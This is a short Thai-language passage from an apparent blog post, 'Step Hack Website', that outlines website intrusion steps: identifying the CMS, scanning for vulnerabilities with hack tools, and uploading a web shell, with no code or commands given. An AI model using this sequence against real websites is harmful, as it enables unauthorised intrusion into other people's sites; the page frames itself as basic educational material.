อย่าง Wordpress , Joomla , Drupal >>>  Cms-Explorer

ขั้นที่ 5 Vulnerability Scanner

หมายถึงขั้นตอนการหาช่องโหว่เว็บ ขั้นตอนนี้ขึ้นอยู่กับ
เทคนิค + ความรู้ + ความสามารถ + Skill ของแต่ละบุคคล ว่ามีกลเม็ดเคล็ดลับวิชาเพียงใด
หากเป็นเว็บที่มีช่องโหว่ที่ เคยทดสอบ และผ่านมือมา หรือเคย เรียนแฮก ก็จะผ่านขั้นตอนนี้ไปได้ง่ายๆ

หรืออาจใช้  Hack tools (โปรแกรมแฮก)
สิ่งที่คุณต้องทำก็แค่การ หา IP และการคลิกเพื่อใช้งานมัน

ขั้นที่ 5 Upload Shell
ก่อนอื่นแนะนำ ก่อนนะครับว่า Shell(หอย) ในภาษาของ แฮกเกอร์ นั้นคืออะไร อ่าน > Shell คืออะไร
เมื่อ Shell ถูกฝังเข้าไปอยู่ในเว็บแล้ว สามารถตรวจสอบได้โดย อ่าน > เว็บโดนแฮก
หมายเหตุบทความนี้เป็นเนื้อหาในระดับเบสิกและพื้นฐานเพื่อสร้างความเข้าใจเกี่ยวกับ แฮกเกอร์

Step Hack Website

By : Mönster Bĸĸ

- Copyright © DR.BAD - Designed by Mönster BKK -